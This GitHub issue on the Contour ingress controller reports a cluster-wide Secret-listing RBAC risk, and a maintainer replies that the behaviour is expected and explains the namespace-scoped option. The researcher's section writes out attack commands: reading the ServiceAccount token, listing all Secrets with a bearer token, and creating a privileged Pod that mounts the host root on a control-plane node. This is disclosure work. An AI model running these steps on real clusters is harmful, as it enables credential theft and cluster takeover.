A potential risk in contour that could lead to takeover of the cluster #6384
Hey @HouqiyuA! Thanks for opening your first issue. We appreciate your contribution and welcome you to our community! We are glad to have you here and to have your input on Contour. You can also join us on our mailing list and in our channel in the Kubernetes Slack Workspace.
Thank you for contacting us. Rest assured, your email was received, and I have replied to it directly. Please accept my apologies for the delay! I've also attached my response in this issue:

The behavior you describe is expected from an ingress controller such as Contour. Users shall be able to create e.g. Ingress and HTTPProxy resources in any namespace, and those resources can reference Secrets in that same namespace. Consider the example given on https://projectcontour.io/docs/1.28/config/tls-termination/, where an HTTPProxy in the "default" namespace refers to the TLS secret "testsecret" in the "default" namespace. Similarly, these two resources can be created in "my-own-namespace" and Contour shall be able to process them as well, without modification of the RBAC rules. The RBAC rules in the Contour example deployment manifest reflect the access permissions needed to implement the ingress APIs. This is a reasonable configuration considering the above functionality, and I do not consider this to be an issue.

Additionally, Contour provides an optional component, the Gateway Provisioner. It acts as a Kubernetes operator and can dynamically provision Gateways (Contour + Envoy). This functionality requires permissions to create Deployments and DaemonSets. See https://projectcontour.io/docs/1.28/config/gateway-api/#dynamic-provisioning.

That said, there is an option for users to deploy Contour in a more restricted environment where cluster-wide access to Secrets is NOT acceptable. This reflects the more granular RBAC rules which you mentioned as mitigation. In this use case the administrator chooses to "sacrifice" some of the functionality offered by Contour in exchange for being able to "harden" the RBAC permissions granted to Contour. It allows using Role/RoleBinding instead of their cluster-wide variants. See the "--watch-namespaces=<ns,ns>" option at https://projectcontour.io/docs/1.28/configuration/#serve-flags and https://projectcontour.io/docs/1.28/deploy-options/#running-multiple-instances-of-contour.

There are always risks associated with any permissions, as you have pointed out. Each user must consider whether this design is acceptable, while also considering that a cluster-wide ingress controller and operator is an extremely common and widely accepted design in the Kubernetes ecosystem.
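As a minimal sketch of that restricted setup (the namespace name "team-a" is illustrative, not taken from the documentation), the serve flag limits which namespaces the instance watches, so that Secret access can be granted with a namespaced Role/RoleBinding:

```sh
# Run a Contour instance that only watches the "team-a" namespace; its RBAC can
# then be scoped with Role/RoleBinding instead of a cluster-wide ClusterRole.
contour serve --incluster --watch-namespaces=team-a
```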
Dear Team Members:
Greetings! Our team is very interested in your project, and we recently identified a potential RBAC security risk while doing a security assessment of it. We would therefore like to report it to you and provide the relevant details so that you can fix and improve it accordingly. I reported this problem to your team's private email ([email protected]) a few days ago, but I am not sure whether your team received it, so I am raising this issue here. I hope you will forgive me if anything here is out of order.
Details:
In this Kubernetes project, there is a ClusterRole that has been granted the high-risk permission to list Secrets. This permission allows the role to list confidential information across the entire cluster. An attacker who can act as the ServiceAccount bound to this ClusterRole can use this permission to list Secret data cluster-wide. By combining it with the permissions of other roles, the attacker can escalate privileges and ultimately take over the entire cluster.
We constructed the following attack vectors.
First, you need to obtain a token for the ServiceAccount that holds this high-risk permission. If you are already inside a Pod running as this ServiceAccount, you can read the token directly with: cat /var/run/secrets/kubernetes.io/serviceaccount/token. If you are on a node rather than inside a Pod, you can read it from the ServiceAccount's token Secret, for example with: kubectl describe secret <serviceaccount-token-secret>.
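A brief sketch of this step (the namespace and Secret name below are hypothetical placeholders, not taken from the report):

```sh
# Inside a Pod running as the target ServiceAccount, the token is mounted on disk:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# From outside the Pod, with kubectl access to the namespace, the token can be read
# from the ServiceAccount's token Secret ("contour-token-xxxxx" is a placeholder):
kubectl -n projectcontour describe secret contour-token-xxxxx
```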
Next, use the obtained token to authenticate to the API server. By including the token in the request, you are authenticated as that ServiceAccount and gain all privileges associated with it. As a result, this ServiceAccount identity can be used to list all Secrets in the cluster.
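A minimal sketch of that API call, assuming TOKEN holds the token obtained in the previous step and the request is made from inside a Pod (where the standard in-cluster environment variables are available):

```sh
# Present the ServiceAccount token as a bearer token and list every Secret
# in the cluster through the Kubernetes API server.
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
curl -sk -H "Authorization: Bearer ${TOKEN}" "${APISERVER}/api/v1/secrets"
```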
We give two ways to further utilize ServiceAccount Token with other privileges to take over the cluster:
Method 1: Privilege escalation using a ServiceAccount token bound to cluster-admin
Directly use a token bound to the cluster-admin role, which has the authority to control the entire cluster. By authenticating with this token, you can gain full control of the cluster.
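As a sketch, assuming ADMIN_TOKEN holds such a token and APISERVER points at the API server (both placeholders), the token can be passed to kubectl directly:

```sh
# Authenticate as the cluster-admin-bound ServiceAccount; cluster-scoped reads
# and writes succeed, demonstrating full control of the cluster.
kubectl --server="${APISERVER}" --token="${ADMIN_TOKEN}" \
  --insecure-skip-tls-verify=true get clusterrolebindings
```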
Method 2: Create privileged containers using a ServiceAccount token with create-pods permission
You can use such a ServiceAccount token to create a privileged container that mounts the node's root directory and, by tolerating the control-plane taints, is scheduled onto the master node. This gives access to the master node's kubeconfig configuration file, which can be leaked and used to take over the entire cluster.
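A minimal sketch of such a Pod (the Pod name, image, taint key, and node label below are illustrative and depend on the actual cluster configuration):

```sh
# Privileged Pod that tolerates the control-plane taint and mounts the node's
# root filesystem at /host, exposing the node's kubeconfig files.
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: attacker-pod                              # hypothetical name
spec:
  nodeSelector:
    node-role.kubernetes.io/control-plane: ""     # illustrative control-plane label
  tolerations:
  - key: node-role.kubernetes.io/control-plane
    operator: Exists
    effect: NoSchedule
  containers:
  - name: shell
    image: busybox
    command: ["sleep", "3600"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF
```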
For the above attack chain we have developed exploit code and uploaded it to GitHub: https://github.com/HouqiyuA/k8s-rbac-poc
We suggest the following mitigation methods:
Carefully evaluate the permissions required for each user or service account to ensure they follow the principle of least privilege, and avoid over-authorization.
If listing Secrets is a required permission, consider using more granular RBAC rules. A namespaced Role and RoleBinding can be used to grant the list-secrets permission instead of a ClusterRole, restricting the permission to specific namespaces or resources rather than the entire cluster (a sketch follows this list).
Isolate different applications into different namespaces and use namespace-level RBAC rules to restrict access. This reduces the risk of privilege leakage across namespaces.
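As a sketch of the namespace-scoped variant mentioned above (the namespace, Role, and binding names are illustrative; the ServiceAccount shown assumes the example Contour deployment):

```sh
# Grant read access to Secrets only inside one namespace instead of cluster-wide.
kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: secret-reader              # hypothetical name
  namespace: team-a                # hypothetical namespace
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: secret-reader-binding
  namespace: team-a
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: secret-reader
subjects:
- kind: ServiceAccount
  name: contour                    # ServiceAccount from the example deployment
  namespace: projectcontour
EOF
```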
We look forward to hearing from you and discussing this risk in more detail. Thank you very much for your time and attention.
Best wishes.
HouqiyuA